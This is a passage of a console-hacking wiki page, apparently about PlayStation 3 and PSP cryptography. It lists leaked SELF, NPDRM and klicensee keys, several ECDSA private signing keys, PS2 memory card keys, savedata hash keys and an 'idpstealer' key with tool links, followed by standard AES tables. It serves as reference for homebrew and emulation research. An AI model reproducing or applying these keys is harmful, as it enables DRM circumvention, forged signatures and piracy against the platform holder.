style=&quot;background-color:lightgrey;&quot;&gt;dec&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;751EE949CD3ADF50A469197494A1EC358409CCBE6E85217EBDE7A87D3FF1ABD8&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;23AE4ADA4D3F798DC5ED98000337FF77&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;1BABA87CD1AD705C462D4E7427B6DAF59A50383A348A15088F0EDFCF1ADF2B5C2B2D507B2A357D36&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;0x1A&lt;/code&gt;&lt;/span&gt;<br /> |-<br /> | app || 4.00-4.11 || 0x1B || =&amp;gt;4.00&amp;nbsp;&amp;lt;=4.11 || dec || &lt;code&gt;66637570D1DEC098467DB207BAEA786861964D0964D4DBAF89E76F46955D181B&lt;/code&gt; || &lt;code&gt;9F7B5713A5ED59F6B35CD8F8A165D4B8&lt;/code&gt; || &lt;code&gt;4AB6FB1F6F0C3D9219923C1AC683137AB05DF667833CC6A5E8F590E4E28FE2EB180C7D5861117CFB&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x12&lt;/code&gt;<br /> |-<br /> | npdrm || 4.00-4.11 || 0x1B np || =&amp;gt;4.00&amp;nbsp;&amp;lt;=4.11 || dec || &lt;code&gt;BCF9BD763A7B787CF1428EF45546AF5EBB3D816ABA1C6FF2FFD3D854B71F355B&lt;/code&gt; || &lt;code&gt;D03979E47D236BD278EC7331B7DA0BD4&lt;/code&gt; || &lt;code&gt;4F30DF9F3A9D6B3AF92510F81F7961DD404F5E09BFF4D989969727509E39B94A750D12A063189848&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x17&lt;/code&gt;<br /> |-<br /> | app || 4.20-{{latest}} || 0x1C || 4.20++ || dec || &lt;code&gt;CFF025375BA0079226BE01F4A31F346D79F62CFB643CA910E16CF60BD9092752&lt;/code&gt; || &lt;code&gt;FD40664E2EBBA01BF359B0DCDF543DA4&lt;/code&gt; || &lt;code&gt;36C1ACE6DD5CCC0006FDF3424750FAC515FC5CFA2C93EC53C6EC2BC421708D154E91F2E7EA54A893&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x09&lt;/code&gt;<br /> |-<br /> | npdrm || 4.20-{{latest}} || 0x1C np || 4.20++ || dec || &lt;code&gt;8103EA9DB790578219C4CEDF0592B43064A7D98B601B6C7BC45108C4047AA80F&lt;/code&gt; || &lt;code&gt;246F4B8328BE6A2D394EDE20479247C5&lt;/code&gt; || &lt;code&gt;503172C9551308A87621ECEE90362D14889BFED2CF32B0B3E32A4F9FE527A41464B735E1ADBC6762&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x30&lt;/code&gt;<br /> |-<br /> | app || 4.20-{{latest}} || 0x1D || 4.20++ || dec || &lt;code&gt;D202174EB65A62048F3674B59EF6FE72E1872962F3E1CD658DE8D7AF71DA1F3E&lt;/code&gt; || &lt;code&gt;ACB9945914EBB7B9A31ECE320AE09F2D&lt;/code&gt; || &lt;code&gt;430322887503CF52928FAAA410FD623C7321281C8825D95F5B47EF078EFCFC44454C3AB4F00BB879&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x1A&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;seven&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;4.20-{{latest}}&lt;/span&gt; || not &quot;0x1E&quot; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;4.20++&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;dec&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;46BD0891224E0CE13E2162921D4BB76193AEEE4416A729FCDD111C5536BF87C9&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;BF036387CDB613C0AC88A6D9D2CC5316&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;A14F6D5F9AD7EBB3B7A39A7C32F13E5DC3B0BA16BDC33D39FDDF88F4AEEA6CFEEB0C0796C917A952&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;0x0F&lt;/code&gt;&lt;/span&gt;<br /> |-<br /> |}<br /> <br /> === klicensee ===<br /> <br /> ==== klic_dec_key ==== <br /> klic_dec_key : F2FBCA7A75B04EDC1390638CCDFDD1EE<br /> See: http://pastie.org/private/k2vlnqi6h8onbkxhpjuxg<br /> <br /> klic_dec_old_key : DC41D59080BFFF45547D0B3A12E591D3<br /> <br /> ==== klic_dev_key ====<br /> Found inside ps1_netemu.self &lt;br /&gt;<br /> Used as klicensee for ISO.BIN.EDAT<br /> klic_dev_key : 52C0B5CA76D6134BB45FC66CA637F2C1<br /> <br /> ==== klic_free_key ====<br /> see NPDRM OMAC Keys<br /> klic_free_key : 72F990788F9CFF745725F08E4C128387<br /> <br /> ==== RIF's act.dat index decryption key ====<br /> actdatix_dec_key : DA7D4B5E499A4F53B1C1A14A7484443B<br /> Actually in vsh.self<br /> <br /> ==== riv_key ====<br /> riv_key : 00000000000000000000000000000000<br /> (former posted value was the sha1 of 0, not a proper key. iv is all zeroes - see also [https://www.das-labor.org/trac/browser/microcontroller-2/crypto-lib/testvectors/Sha-1-160.test-vectors :/])<br /> Actually in appldr<br /> <br /> ==== klicensee constant ====<br /> klicensee_const : 5E06E04FD94A71BF0000000000000001<br /> Actually in lv2_kernel.self<br /> <br /> ==== klicensee(psp) ====<br /> Found inside psp_emulator.self &lt;br /&gt;<br /> Used as klicensee for ISO.BIN.EDAT<br /> <br /> klicensee for psp minis:<br /> <br /> klic_psp: 2A6AFBCF43D1579F7D738741A13BD42E<br /> <br /> klicensee for psp remasters:<br /> <br /> klic_pe : 0DB85732366CD734FC879E743343BB4F<br /> <br /> ==== vsh pub + curvetable ====<br /> pub : 6227B00A02856FB04108876719E0A0183291EEB96E736ABF81F70EE9161B0DDEB026761AFF7BC85B<br /> curves : 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000<br /> 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000<br /> 0000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFE000000<br /> 00000000000000000000000000FFFFFFFE00000000000000039A2EB773FCA61DCB5236A42C6F7FEB426E5ADA06<br /> 0000000000000000FFFE4A39E80D6F151E245270DDA65311EAB7634F69577D0F51E30602711A07059FBCA7BA92<br /> F5E34D6F7216F0D828A37D413EF73F0000000000000000FFFFFFFE00000000000000000000000000000000FFFF<br /> FFFE00000000000000035974123CCBE7FD63E2C31CC465CDE0334461F0F4000000000000000100004A51C3ADC1<br /> 9C6BB0DED8ED713BDA9B780270209B1DBC843F5E092A5021D3A6A7AA814E24FFED9FBDAADB243C862A53A0B520<br /> inv_curves: FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF<br /> FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF<br /> FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF00000001FFFFFF<br /> FFFFFFFFFFFFFFFFFFFFFFFFFF00000001FFFFFFFFFFFFFFFC65D1488C0359E234ADC95BD3908014BD91A525F9<br /> FFFFFFFFFFFFFFFF0001B5C617F290EAE1DBAD8F2259ACEE15489CB096A882F0AE1CF9FD8EE5F8FA604358456D<br /> 0A1CB2908DE90F27D75C82BEC108C0FFFFFFFFFFFFFFFF00000001FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF0000<br /> 0001FFFFFFFFFFFFFFFCA68BEDC33418029C1D3CE33B9A321FCCBB9E0F0BFFFFFFFFFFFFFFFEFFFFB5AE3C523E<br /> 63944F2127128EC4256487FD8FDF64E2437BC0A1F6D5AFDE2C5958557EB1DB001260425524DBC379D5AC5F4ADF<br /> <br /> Notes:&lt;br /&gt;<br /> *It is used for rif/act.dat signatures, for example.&lt;br /&gt;<br /> <br /> [http://www.multiupload.com/A19Q0HV7OW vsh-pub-curves.rar (367 Bytes)]<br /> <br /> == Snowden Key (in vsh.elf or vshnet.prx into old firmwares) ==<br /> 9DE004E9F2D72F6DE377699BC2E5F83A4C28EEA575DBEAA293F3835E8B7AFA9A <br /> 16573AD5B0DEEBCCE1A7C54C66B903AE4186FBD7EEB23F16E67A19420B262114 <br /> 08B91715ACC3D1998A37A4639FAFF064E9F90C0FECB28C813FA9F649074C9A33 <br /> 0392EA2B91C3FD3732D1DFED7CA151A21926F0B315107BF1FBEA8929E68AB397<br /> <br /> == VSH CryptoEngine Sha1Hmac keys ==<br /> key0 685E2534695D79096F57640044315B515E0C7E55<br /> key1 46753933634D1A1D464142752110116F2C5E7836<br /> key2 59CB6067574D873CEFD7B75A300529C18BFB75ED<br /> key3 C699CF88072F6819D5DAFA7A2EEB93E537E0ADE2<br /> key4 E8ABDAE8F81C086123FE5D6281BB0F0DEE909AF5<br /> key5 F8A05D44A04E5C036812261DB70EE1708EBC4D48<br /> key6 A3F58C9913A108BE8C1EDB889C2BF8F7578101DA<br /> key7 B6627AE4422F9D81E1421FA2B1DB02841E64B933<br /> <br /> == NPDRM stuff ==<br /> &lt;!--// needs some logical reordering in module subsection //--&gt;<br /> http://img24.imageshack.us/img24/9083/snapshote.png<br /> <br /> ==== GPKG/SELF ECDSA signature ====<br /> Public key: &lt;code&gt;E6792E446CEBA27BCADF374B99504FD8E80ADFEB3E66DE73FFE58D3291221C65018C038D3822C3C9&lt;/code&gt;&lt;br /&gt;<br /> Public bak: &lt;code&gt;D9AAEB6054307FC0FB488B15AE11B558C75FC8A3EC4907E129C5B5CD386D94D82318B9D558777C5A&lt;/code&gt;&lt;br /&gt;<br /> Curve type: 2 (vsh)&lt;br /&gt;<br /> <br /> ==== NPDRM OMAC Keys ====<br /> npdrm-omac-key-1: 72F990788F9CFF745725F08E4C128387<br /> npdrm-omac-key-2: 6BA52976EFDA16EF3C339FB2971E256B<br /> npdrm-omac-key-3: 9B515FEACF75064981AA604D91A54E97<br /> <br /> == PSISOIMG0000 ==<br /> See also : [[PSISOIMG0000]]&lt;br /&gt;<br /> <br /> Public key: <br /> &lt;code&gt;948DA13E8CAFD5BA0E90CE434461BB327FE7E080475EAA0AD3AD4F5B6247A7FDA86DF69790196773&lt;/code&gt;&lt;br /&gt;<br /> Private key: <br /> &lt;code&gt;00bf21224b041f29549db25e9aade19e720a1fe0f1&lt;/code&gt;&lt;br /&gt;<br /> Curve type: 2 (vsh-curves, but can be found in ps1_netemu, too)&lt;br /&gt;<br /> This key is also used for signing content of the ISO.BIN.EDAT (decrypted form). The signature is located at the tail of the decrypted ISO.BIN.EDAT, its length is 0x28 bytes.<br /> <br /> location: inside ps1_newemu.self (example from 3.55, but same as 2.10 and higher):<br /> Offset(h) 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F<br /> 00126AB0 94 8D A1 3E 8C AF D5 BA 0E 90 CE 43 44 61 BB 32 ”.¡&gt;Œ¯Õº..ÎCDa»2<br /> 00126AC0 7F E7 E0 80 47 5E AA 0A D3 AD 4F 5B 62 47 A7 FD .çà€G^ª.Ó­O[bG§ý<br /> 00126AD0 A8 6D F6 97 90 19 67 73 ¨mö—..gs<br /> and ps1_netemu.self (example from 3.55, but same as 1.70 and higher):<br /> Offset(h) 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F<br /> 0016FA10 94 8D A1 3E 8C AF D5 BA 0E 90 CE 43 44 61 BB 32 ”.¡&gt;Œ¯Õº..ÎCDa»2<br /> 0016FA20 7F E7 E0 80 47 5E AA 0A D3 AD 4F 5B 62 47 A7 FD .çà€G^ª.Ó­O[bG§ý<br /> 0016FA30 A8 6D F6 97 90 19 67 73 ¨mö—..gs<br /> <br /> == DOCUMENT.DAT ==<br /> des key: 39F7EFA16CCE5F4C<br /> <br /> des iv: A819C4F5E154E30B<br /> Location: ps1_netemu.self<br /> <br /> == PS2 Keys ==<br /> MC_CARDKEY_MATERIAL_1 6C26D37F46EE9DA9 &lt;-mc_iso<br /> MC_CARDKEY_HASHKEY_1 CE62F68420B65A81E459FA9A2BB3598A &lt;-mc_iso<br /> MC_CARDKEY_MATERIAL_2 2CD160FA8C2ED362 &lt;-mc_iso<br /> MC_CARDKEY_HASHKEY_2 7014A32FCC5B1237AC1FBF4ED26D1CC1 &lt;-mc_iso<br /> MC_CHALLENGE_MATERIAL 2C5BF48D32749127 &lt;-mc_iso<br /> MG_KBIT_MATERIAL 35C860019222BB60 &lt;-me_iso<br /> MG_KC_MATERIAL 8C2BD03EC245C56D &lt;-me_iso<br /> MG_KBIT_MASTER_KEY 5001C87121F939C144D86B069224B247 &lt;- me_iso<br /> MG_KC_MASTER_KEY 77F38314B047D87C9B37D266049228C4 &lt;- me_iso<br /> META_KEY_RETAIL 389DCBA5203C8159ECF94C9393164CC9 &lt;- sb_iso<br /> DATA_KEY_RETAIL 1017823463F468C1AA41D700B140F257 &lt;- sb_iso<br /> VMC_KEY_RETAIL 64E30D19A16941D677E32EEBE07F45D2 &lt;- sb_iso<br /> META_KEY_DEBUG 2B05F7C7AFD1B169D62586503AEA9798 &lt;- sb_iso <br /> DATA_KEY_DEBUG 74FF7E5D1D7B96943BEFDCFA81FC2007 &lt;- sb_iso <br /> VMC_KEY_DEBUG 30479D4B80E89E2B59E5C9145E1064A9 &lt;- sb_iso<br /> <br /> == KIRK ==<br /> <br /> * Note: KIRK CMD11 isn't vulnerable to retrieval of private key. KIRK1 is.<br /> <br /> '''see also:'''<br /> * https://github.com/uofw/upspd/wiki/KIRK-13---ECDSA-point-multiplication<br /> * https://code.google.com/p/kirk-engine/source/browse/trunk/libkirk/kirk_engine.c<br /> * http://wololo.net/talk/viewtopic.php?f=6&amp;t=7224<br /> * http://jpcsp.googlecode.com/svn-history/r2166/trunk/src/jpcsp/crypto/CryptoEngine.java [https://github.com/codestation/mhtools/blob/master/src/jpcsp/crypto/CryptoEngine.java] / https://code.google.com/p/jpcsp/source/browse/trunk/src/jpcsp/crypto/KeyVault.java [https://github.com/codestation/mhtools/tree/master/src/keys]<br /> <br /> === Private-Public Crypto ===<br /> <br /> // KIRK CMD1 ECDSA Private Key<br /> kirk1_priv = F392E26490B80FD889F2D9722C1F34D7274F983D<br /> <br /> // PSP EDAT ECDSA Private Key<br /> edat_priv = E5C4D0A8249A6F27E5E0C9D534F4DA15223F42AD<br /> <br /> // NPUMDIMG ECDSA Private Key<br /> priv_key_npumdimg = 14B022E892CF8614A44557DB095C928DE9B89970<br /> <br /> // KIRK1 ECDSA Private Key<br /> kirk1_pub_x = ED9CE58234E61A53C685D64D51D0236BC3B5D4B9 <br /> kirk1_pub_y = 049DF1A075C0E04FB344858B61B79B69A63D2C39<br /> <br /> // PSP EDAT ECDSA Public Key<br /> edat_pub_x = 1F072BCCC162F2CFAEA0E7F4CDFD9CAEC6C45521<br /> edat_pub_y = 5301F4E370C3EDE2D4F5DBC3A7DE8CAAE8AD5B7D<br /> <br /> // NPUMDIMG ECDSA Public Key<br /> npdu_pub_x = 0121EA6ECDB23A3E2375671C5362E8E28B1E783B<br /> npdu_pub_y = 1A2732158B8CED98466C18A3AC3B1106AFB4EC3B<br /> <br /> /* ECC Curves for Kirk 1 and Kirk 11 */<br /> // Common Curve paramters p and a<br /> ec_p = FFFFFFFFFFFFFFFF00000001FFFFFFFFFFFFFFFF<br /> ec_a = FFFFFFFFFFFFFFFF00000001FFFFFFFFFFFFFFFC // mon<br /> <br /> // Kirk C,D,10,11,(likely 12)- Unique curve parameters for b, N, and base point G for Kirk C,D,10,11,(likely 12) service<br /> // Since public key is variable, it is not specified here<br /> ec_b2 = A68BEDC33418029C1D3CE33B9A321FCCBB9E0F0B// mon<br /> ec_N2 = 00FFFFFFFFFFFFFFFEFFFFB5AE3C523E63944F2127<br /> Gx2 = 128EC4256487FD8FDF64E2437BC0A1F6D5AFDE2C <br /> Gy2 = 5958557EB1DB001260425524DBC379D5AC5F4ADF <br /> <br /> // KIRK 1 - Unique curve parameters for b, N, and base point G<br /> // Since public key is hard coded, it is also included<br /> <br /> ec_b1 = 65D1488C0359E234ADC95BD3908014BD91A525F9<br /> ec_N1 = 00FFFFFFFFFFFFFFFF0001B5C617F290EAE1DBAD8F<br /> Gx1 = 2259ACEE15489CB096A882F0AE1CF9FD8EE5F8FA <br /> Gy1 = 604358456D0A1CB2908DE90F27D75C82BEC108C0<br /> <br /> === Private Crypto ===<br /> <br /> // KIRK CMD1 AESCBC128-CMAC key<br /> kirk1_key = 98C940975C1D10E87FE60EA3FD03A8BA<br /> <br /> // KIRK CMD4 and CMD7 AESCBC128 key table<br /> kirk7_key02 = B813C35EC64441E3DC3C16F5B45E6484 // New from PS3<br /> kirk7_key03 = 9802C4E6EC9E9E2FFC634CE42FBB4668<br /> kirk7_key04 = 99244CD258F51BCBB0619CA73830075F<br /> kirk7_key05 = 0225D7BA63ECB94A9D237601B3F6AC17<br /> kirk7_key07 = 76368B438F77D87EFE5FB6115939885C // New from PS3<br /> kirk7_key0C = 8485C848750843BC9B9AECA79C7F6018<br /> kirk7_key0D = B5B16EDE23A97B0EA17CDBA2DCDEC46E<br /> kirk7_key0E = C871FDB3BCC5D2F2E2D7729DDF826882<br /> kirk7_key0F = 0ABB336C96D4CDD8CB5F4BE0BADB9E03<br /> kirk7_key10 = 32295BD5EAF7A34216C88E48FF50D371<br /> kirk7_key11 = 46F25E8E4D2AA540730BC46E47EE6F0A<br /> kirk7_key12 = 5DC71139D01938BC027FDDDCB0837D9D<br /> kirk7_key38 = 12468D7E1C42209BBA5426835EB03303<br /> kirk7_key39 = C43BB6D653EE67493EA95FBC0CED6F8A<br /> kirk7_key3A = 2CC3CF8C2878A5A663E2AF2D715E86BA<br /> kirk7_key44 = 7DF49265E3FAD678D6FE78ADBB3DFB63 // New from PS3<br /> kirk7_key4B = 0CFD679AF9B4724FD78DD6E99642288B //1.xx game eboot.bin<br /> kirk7_key53 = AFFE8EB13DD17ED80A61241C959256B6<br /> kirk7_key57 = 1C9BC490E3066481FA59FDB600BB2870<br /> kirk7_key5D = 115A5D20D53A8DD39CC5AF410F0F186F<br /> kirk7_key63 = 9C9B1372F8C640CF1C62F5D592DDB582<br /> kirk7_key64 = 03B302E85FF381B13B8DAA2A90FF5E61 <br /> <br /> //KIRK Unknown 100 key<br /> kirk_unk100 = 000102030405060708090A0B0C0D0E0F<br /> <br /> // KIRK CMD0x10 key<br /> kirk10_key = 475E09F4A237DA9BEFFF3BC077143D8A<br /> <br /> // CHNNLSV SaveData keys<br /> sdHashKey1 = 40E6533F05113A4EA14BDAD6727C534C<br /> sdHashKey2 = FAAA50EC2FDE5493AD14B2CEA53005DF<br /> sdHashKey3 = 36A53EACC5269EA383D9EC256C484872<br /> sdHashKey4 = D8C0B0F33E6B7685FDFB4D7D451E9203<br /> sdHashKey5 = CB15F407F96A523C04B9B2EE5C53FA86<br /> sdHashKey6 = 7044A3AEEF5DA5F2857FF2D694F5363B<br /> sdHashKey7 = EC6D29592635A57F972A0DBCA3263300<br /> <br /> // AMCTRL keys<br /> amHashKey1 = 9C48B62840E6533F05113A4E65E63A64<br /> amHashKey2 = 70B47BC0A14BDAD6E01014ED727C534C<br /> amHashKey3 = E350ED1D910A1FD029BB1C3EF34077FB<br /> amHashKey4 = 135FA47CAB395BA476B8CCA98F3A0445<br /> amHashKey5 = 678D7FA32A9CA0D1508AD8385E4B017E<br /> <br /> ==Idpstealer Key?==<br /> <br /> DES encrypt 192? bit<br /> 5E5B43EF9BC2CD75B0F2AEF7FD3B199762D6C13280E50D3E 0000000000000000<br /> <br /> === Idpstealer Key Confusion ===<br /> <br /> * here's the executable (with printf) :<br /> https://mega.nz/#!FwsWwCoJ!eReYmfKNvEXMNdG7YLBrNJui1sxeN1FIRzpqEFQTikM<br /> * here's the source (with printf) : http://pastie.org/private/slfjwzyshcrsq7mnycxc0w<br /> * here's the specific function : http://pastie.org/10530594<br /> * usage: &lt;code&gt; idpstealer.exe idps.bin &lt;/code&gt;<br /> * output: &lt;code&gt; SID_KEY: 5E5B43EF9BC2CD75B0F2AEF7FD3B199762D6C13280E50D3E &lt;/code&gt;<br /> <br /> ==Sbox Values==<br /> <br /> {| class=&quot;wikitable&quot;<br /> ! D/L !! hex !! Note <br /> |-<br /> | [http://www.multiupload.com/B5F336G4UF] <br /> | S-box (You can read more about this here http://en.wikipedia.org/wiki/Rijndael_S-box)<br /> Offset(h) 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F<br /> <br /> 00018F80 63 7C 77 7B F2 6B 6F C5 30 01 67 2B FE D7 AB 76 c|w{òkoÅ0.g+þ׫v<br /> 00018F90 CA 82 C9 7D FA 59 47 F0 AD D4 A2 AF 9C A4 72 C0 Ê‚É}úYGð­Ô¢¯œ¤rÀ<br /> 00018FA0 B7 FD 93 26 36 3F F7 CC 34 A5 E5 F1 71 D8 31 15 ·ý“&amp;6?÷Ì4¥åñqØ1.<br /> 00018FB0 04 C7 23 C3 18 96 05 9A 07 12 80 E2 EB 27 B2 75 .Ç#Ã.–.š..€âë'²u<br /> 00018FC0 09 83 2C 1A 1B 6E 5A A0 52 3B D6 B3 29 E3 2F 84 .ƒ,..nZ R;Ö³)ã/„<br /> 00018FD0 53 D1 00 ED 20 FC B1 5B 6A CB BE 39 4A 4C 58 CF SÑ.í ü±[j˾9JLXÏ<br /> 00018FE0 D0 EF AA FB 43 4D 33 85 45 F9 02 7F 50 3C 9F A8 ÐïªûCM3…Eù..P&lt;Ÿ¨<br /> 00018FF0 51 A3 40 8F 92 9D 38 F5 BC B6 DA 21 10 FF F3 D2 Q£@.’.8õ¼¶Ú!.ÿóÒ<br /> 00019000 CD 0C 13 EC 5F 97 44 17 C4 A7 7E 3D 64 5D 19 73 Í..ì_—D.ħ~=d].s<br /> 00019010 60 81 4F DC 22 2A 90 88 46 EE B8 14 DE 5E 0B DB `.OÜ&quot;*.ˆFî¸.Þ^.Û<br /> 00019020 E0 32 3A 0A 49 06 24 5C C2 D3 AC 62 91 95 E4 79 à2:.I.$\ÂÓ¬b‘•äy<br /> 00019030 E7 C8 37 6D 8D D5 4E A9 6C 56 F4 EA 65 7A AE 08 çÈ7m.ÕN©lVôêez®.<br /> 00019040 BA 78 25 2E 1C A6 B4 C6 E8 DD 74 1F 4B BD 8B 8A ºx%..¦´ÆèÝt.K½‹Š<br /> 00019050 70 3E B5 66 48 03 F6 0E 61 35 57 B9 86 C1 1D 9E p&gt;µfH.ö.a5W¹†Á.ž<br /> 00019060 E1 F8 98 11 69 D9 8E 94 9B 1E 87 E9 CE 55 28 DF áø˜.iÙŽ”›.‡éÎU(ß<br /> 00019070 8C A1 89 0D BF E6 42 68 41 99 2D 0F B0 54 BB 16 Œ¡‰.¿æBhA™-.°T».<br /> | Present in all SPU binaries that perform AES (see [http://www.psdevwiki.com/ps3/AES_binaries here])<br /> |-<br /> | <br /> | Inverse AES S-box<br /> Offset(h) 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F<br /> <br /> 008633C0 52 09 6A D5 30 36 A5 38 BF 40 A3 9E 81 F3 D7 FB R.jХ06Ґ8ї@ЈћЃуЧы<br /> 008633D0 7C E3 39 82 9B 2F FF 87 34 8E 43 44 C4 DE E9 CB |г9‚›/я‡4ЋCDДЮйЛ<br /> 008633E0 54 7B 94 32 A6 C2 23 3D EE 4C 95 0B 42 FA C3 4E T{”2¦В#=оL•.BъГN<br /> 008633F0 08 2E A1 66 28 D9 24 B2 76 5B A2 49 6D 8B D1 25 ..Ўf(Щ$Іv[ўIm‹С%<br /> 00863400 72 F8 F6 64 86 68 98 16 D4 A4 5C CC 5D 65 B6 92 rшцd†h..Ф¤\М]e¶’<br /> 00863410 6C 70 48 50 FD ED B9 DA 5E 15 46 57 A7 8D 9D 84 lpHPэн№Ъ^.FW§Ќќ„<br /> 00863420 90 D8 AB 00 8C BC D3 0A F7 E4 58 05 B8 B3 45 06 ђШ«.ЊјУ.чдX.ёіE.<br /> 00863430 D0 2C 1E 8F CA 3F 0F 02 C1 AF BD 03 01 13 8A 6B Р,.ЏК?..БЇЅ...Љk<br /> 00863440 3A 91 11 41 4F 67 DC EA 97 F2 CF CE F0 B4 E6 73 :‘.AOgЬк—тПОрґжs<br /> 00863450 96 AC 74 22 E7 AD 35 85 E2 F9 37 E8 1C 75 DF 6E –¬t&quot;з.5…вщ7и.uЯn<br /> 00863460 47 F1 1A 71 1D 29 C5 89 6F B7 62 0E AA 18 BE 1B Gс.q.)Е‰o·b.Є.ѕ.<br /> 00863470 FC 56 3E 4B C6 D2 79 20 9A DB C0 FE 78 CD 5A F4 ьV&gt;KЖТy љЫАюxНZф<br /> 00863480 1F DD A8 33 88 07 C7 31 B1 12 10 59 27 80 EC 5F .ЭЁ3€.З1±..Y'Ђм_<br /> 00863490 60 51 7F A9 19 B5 4A 0D 2D E5 7A 9F 93 C9 9C EF `Q.©.µJ.-еzџ“Йњп<br /> 008634A0 A0 E0 3B 4D AE 2A F5 B0 C8 EB BB 3C 83 53 99 61  а;M®*х°Ил»&lt;ѓS™a<br /> 008634B0 17 2B 04 7E BA 77 D6 26 E1 69 14 63 55 21 0C 7D .+.~єwЦ&amp;бi.cU!.}<br /> |<br /> |-<br /> |}<br /> <br /> in another form (from updater in ebootroms) : http://pastie.org/10070142 | http://pastie.org/10070145<br /> <br /> == RCON ==<br /> 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00<br /> 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00<br /> 04 00 00 00 04 00 00 00 04 00 00 00 04 00 00 00<br /> 08 00 00 00 08 00 00 00 08 00 00 00 08 00 00 00<br /> 10 00 00 00 10 00 00 00 10 00 00 00 10 00 00 00<br /> 20 00 00 00 20 00 00 00 20 00 00 00 20 00 00 00<br /> 40 00 00 00 40 00 00 00 40 00 00 00 40 00 00 00<br /> 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00<br /> 1B 00 00 00 1B 00 00 00 1B 00 00 00 1B 00 00 00<br /> 36 00 00 00 36 00 00 00 36 00 00 00 36 00 00 00<br /> <br /> == Shuffles ==<br /> 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F<br /> 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10<br /> 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11<br /> 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12<br /> 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13<br /> 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14<br /> 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15<br /> 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16<br /> 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17<br /> 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17 18<br /> 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17 18 19<br /> 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17 18 19 1A<br /> 0C 0D 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B<br /> 0D 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B 1C<br /> 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D<br /> 0F 10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E<br /> 10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F<br /> <br /> == ShiftRows tab ==<br /> 00 05 0A 0F 04 09 0E 03 08 0D 02 07 0C 01 06 0B<br /> 05 0A 0F 00 09 0E 03 04 0D 02 07 08 01 06 0B 0C<br /> 0A 0F 00 05 0E 03 04 09 02 07 08 0D 06 0B 0C 01<br /> 0F 00 05 0A 03 04 09 0E 07 08 0D 02 0B 0C 01 06<br /> <br /> == InvShiftRows tab ==<br /> 00 0D 0A 07 04 01 0E 0B 08 05 02 0F 0C 09 06 03<br /> 0D 0A 07 00 01 0E 0B 04 05 02 0F 08 09 06 03 0C<br /> 0A 07 00 0D 0E 0B 04 01 02 0F 08 05 